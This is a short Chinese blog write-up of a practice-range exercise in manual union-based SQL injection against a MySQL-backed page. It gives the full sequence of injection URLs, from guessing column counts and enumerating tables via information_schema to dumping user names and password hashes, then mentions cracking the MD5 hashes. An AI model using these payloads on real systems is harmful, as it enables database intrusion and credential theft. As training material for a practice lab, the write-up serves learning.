sql手工注入漏洞测试(MYSQL)-墨者-url信息

背景:

自己在墨者官网靶场练习的时候,一直出错,手工容易出错,所以列举一些信息供大家核对,可以参考改动。

bash 复制代码
数据库版本version()              5.7.22-0ubuntu0.16.04.1
当前数据库名称database()        mozhe_Discuz_StormGroup
当前数据库用户user()             root@localhost
操作系统@@version_compile_os    Linux

信息:

一、猜列

bash 复制代码
124.70.22.208:45582/new_list.php?id=-1 order by $number

结果:1,2,3,4,只显示2,3

二、inmation_schema查表:

bash 复制代码
124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'

查询结果:StormGroup_member,notice

三、①StormGroup_member表中的列:

bash 复制代码
124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

查询结果:id,name,password,status

四、②notice表中的列:

bash 复制代码
124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='notice'

查询结果:id,title,content,time

分析:显然StormGroup_member表中的列更符合预期,查其中的数据

五、查name,password:

bash 复制代码
124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member

查询结果,有两个name和对应的password。

总结:

md5解密后只有一个name可以使用。手工注入较为繁琐,但能锻炼对漏洞的理解,读者们发现问题可私信交流。

相关推荐
Nimsolax23 分钟前
Linux网络Socket编程TCP
linux·网络·tcp/ip
YoungLime1 小时前
DVWA靶场之十六:未验证的重定向漏洞(Open HTTP Redirect)
网络·安全·web安全
W.Buffer3 小时前
通用:MySQL-深入理解MySQL中的MVCC:原理、实现与实战价值
数据库·mysql
心态特好4 小时前
详解redis,MySQL,mongodb以及各自使用场景
redis·mysql·mongodb
一只小bit4 小时前
MySQL 库的操作:从创建配置到备份恢复
服务器·数据库·mysql·oracle
sanx184 小时前
专业电竞体育数据与系统解决方案
前端·数据库·apache·数据库开发·时序数据库
养生技术人7 小时前
Oracle OCP认证考试题目详解082系列第57题
运维·数据库·sql·oracle·开闭原则
不良人天码星7 小时前
redis-zset数据类型的常见指令(sorted set)
数据库·redis·缓存
心灵宝贝7 小时前
libopenssl-1_0_0-devel-1.0.2p RPM 包安装教程(openSUSE/SLES x86_64)
linux·服务器·数据库
XUE-52113148 小时前
路由策略与路由控制实验
运维·网络·网络协议·智能路由器